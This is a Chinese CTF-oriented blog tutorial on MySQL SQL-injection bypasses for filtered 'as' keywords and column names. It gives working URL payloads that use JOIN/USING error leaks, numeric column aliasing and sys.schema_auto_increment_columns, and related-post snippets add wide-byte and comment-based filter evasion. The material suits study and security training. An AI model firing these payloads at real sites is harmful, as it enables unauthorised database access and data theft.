SQL注入绕过之过滤了‘as‘与无列名注入

最新推荐文章于 2024-08-29 20:15:55 发布
最新推荐文章于 2024-08-29 20:15:55 发布
阅读量1.6k 收藏 6
点赞数 1
分类专栏: SQL注入 CTF 文章标签: mysql sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52118430/article/details/125107854
版权

0x00 当过滤了as时:

也就代表database()无法使用,无法查询数据库信息

  • 换思路获取库名,利用报错:

        -1' || (select*from aa)# 
        -1'or(select*from aa)# 
        //aa为不存在的表名

        报错回显中直接给出了数据库的名字。

  • 利用schema(mysql特性),记录了所有数据库的信息在information_schema.schemata中

0x01 当column被过滤的无列名注入

  • 使用join报错得列名:

原理:通过系统关键词join可建立两个表之间的内连接。通过对想要查询列名所在的表与其自身内连接,会由于冗余的原因(相同列名存在),而发生错误。并且报错信息会存在重复的列名,可以使用 using 表达式挨个包含查询每一列,实现列的转移。

常规爆字段名操作:

获取第一列的字段名及后面每一列字段名:

?id=-1' union select*from (select * from users as a join users as b)as c--+

?id=-1' union select*from (select * from users as a join users b using(id,username))c--+

?id=-1' union select*from (select * from users as a join users b using(id,username,password))c--+

数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。

  • 通过起别名的方式:

        select 1,2,3,4,5 union select * from users;
        无列名注入关键 就是要猜测表里有多少个列,要一一对应上,上面例子是有4个列
        1,2,3,4的作用就是对列起别名,替换为后面无列名注入做准备

例如知道第三列代表的password,直接对第三列进行查询

当反引号(`)被禁用时,就可以使用起别名的方法来代替

select b from (select 1,2, 3 as b ,4 union select * from users)as a;

在注入时同时查询多个列

select group_concat(b,c) from (select 1,2, 3 as b , 4 as c  union select * from users)as a;

0x02 利用sys.schema_auto_increment_columns 新特性

在mysql>=5.7版本中,新增了sys.schema_auto_increment_columns 属性,用于自动记录对表自增id的监控; 例如对于一个数据库表中存在的id列,若是设置为int型且自增则会记录于sys.schema_auto_increment_columns中,其中包括了数据库名称等内容,从另一方面绕过了对information_schema的过滤

 

 

限制条件:

mysql ≥ 5.7版本

一般需超级管理员才可以访问sys

爆表名常规操作:

?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+

?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

 参考链接:

information_schema过滤与无列名注入_paidx0的博客-CSDN博客

https://www.cnblogs.com/Dark1nt/p/14780958.html

Bypass information_schema 与无列名注入_Newiy Gnaw的博客-CSDN博客

买Lemon也用劵
关注
专栏目录
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1344
information_schema过滤与无列名注入
SQL列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2890
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL注入-绕过篇】
最新发布
m0_62373986的博客
08-29 688
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库中。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
墨者SQL过滤字符后手工注入漏洞测试(第3题)
wswr的博客
03-18 977
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 1167
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
墨者学院--SQL过滤字符后手工注入
weixin_43071873的博客
07-26 209
1.这道题的关键点有两个 1) 符号替代:空格->/**/ =->like and->&& or->|| 2) 需将整条语句转换为URL编码。(百度搜索有很多,只需确保不存在字母等),具体可以看下边 2.寻找注入点 首先按常规步骤,and 1=1,and 1=2,‘ and ‘1’=‘1,and ’1‘=’2,发现页面并没有反应 所以可能存在字符被过滤的可能,采用符号替代:空格->/**/ =->like and->&&
SQL过滤字符后手工注入漏洞测试(第2题)
weixin_47493074的博客
10-03 234
SQL过滤字符后手工注入漏洞测试(第2题)
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4202
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
SWPU2019 Web1(无列名注入、MariaDB)
weixin_52780973的博客
10-31 1089
sql注入、无列名注入、MariaDB
[SWPU2019]Web1 &&二次注入&&过滤or,*&&无列名注入
qq_37301470的博客
12-04 727
[SWPU2019]Web1 好难一道题,发现自己有好多东西都没掌握,过去也就听个名字。 审题 注册个账号,登录 只有申请发布广告,发现可以把广告名字和内容插入页面 还有个查看详情按钮,单击后发现有一个get类型提交的id参数 可是尝试了 ?id=1' and 1=1 ?id=1' and 1=2 ?id=1 ?id=1) //等等 啥反应也没有,应该是严格的过滤了 又由于之前的可以编辑广告内容和标题 猜测可以二次注入 猜测源码 在detail.php中显示的广告名称等都是从数据库中获得。 应该是先通过查
SQL注入的order by ,limit与宽字节注入
Miracle_ze的博客
08-09 974
定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。.........
刷题笔记:SQL过滤字符后手工注入漏洞测试(第1题)
m0_67399862的博客
05-26 541
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
sql注入过滤
chenyu112的专栏
06-23 310
过滤的字符如:=/还有就是and,or,not等,包括大小字暂时就想到这么多,以后想到再补充
数据库注入过滤总结
zhangshanfeng_的博客
06-17 1287
数据库注入总结 文章目录数据库注入总结fuzzMYSQL基本语句万能密码报错注入盲注时间盲注绕过配合sprintfsqlmap文件操作waf绕过结构猜测 fuzz burp的爆破功能,使用wfuzz的sql字典 可以初步得知过滤的情况 MYSQL 基本语句 数据库名 SELECT database(); SELECT group_concat(schema_name) FROM informa...
BUUCTF——[SWPU2019]Web1 sql列名注入
m0_62107966的博客
03-19 383
MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。这里因为回显出来的位数是2,3,我直接查看的第二列,内容如下。数据库保存着mysql所有其他数据库的信息,包括了数据库名,表名,字段名等,无列名注入。适用条件information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_
sql注入中的过滤问题
csjjjd的博客
01-27 525
在这个语句中,**/被用作注释符号,是一种可以跨行注释的注释符。它将后续的内容都注释掉,从而避免了一些输入过滤注入过滤,可以进行SQL注入从而获取数据或进行其他恶意操作。id=1 or 1=1#时提示错误,从这里可以看出对面过滤了点什么导致我的语句出错了,因为我这个语句是用真的,不管放在哪都是会一定正确的,但是这里提示错误的。顺带一提:看来大佬wp后发现其实过滤空格还可以使用()括号来绕过,但是我觉得还是/**/用的习惯,希望本文能够帮助大家。4.直接拿到flag。
sql注入关键字过滤1
weixin_43345082的博客
06-24 1026
做了一道sql的练习,学到了一个姿势 i春秋的题目 题目是关键字过滤 过滤了order select 等关键字 我们用<>关键字 到四没有数据,说明只有三列 只有第二列有回显 爆库 爆表 爆列 flag ...
mysql 过滤指定数据库_MySQL数据库常规操作&&一些简单绕过过滤的方法
weixin_30941215的博客
01-27 351
MySQL数据库登录MySQLmysql -u 用户名 -p 密码 -h 主机IP -P 端口号 但这样密码会暴露在屏幕上,也可以-p后面不输密码,回车后输入就会变成******,这样也是可以登录,默认端口3306没有修改的话可以省略-p参数,本地数据库可以省略-h 下面将数据库端口修改为3316,使用mysql -uroot -p -P3316进行登录 查库show databases; 新增数...
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1167
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
SQL注入绕过WAF策略与技巧解析
以下是一些常用的SQL注入绕过WAF的方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数传递恶意SQL代码。 - POST注入:在表单提交的数据中插入SQL。 - COOKIE注入:利用HTTP头或Cookie中的数据进行注入。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值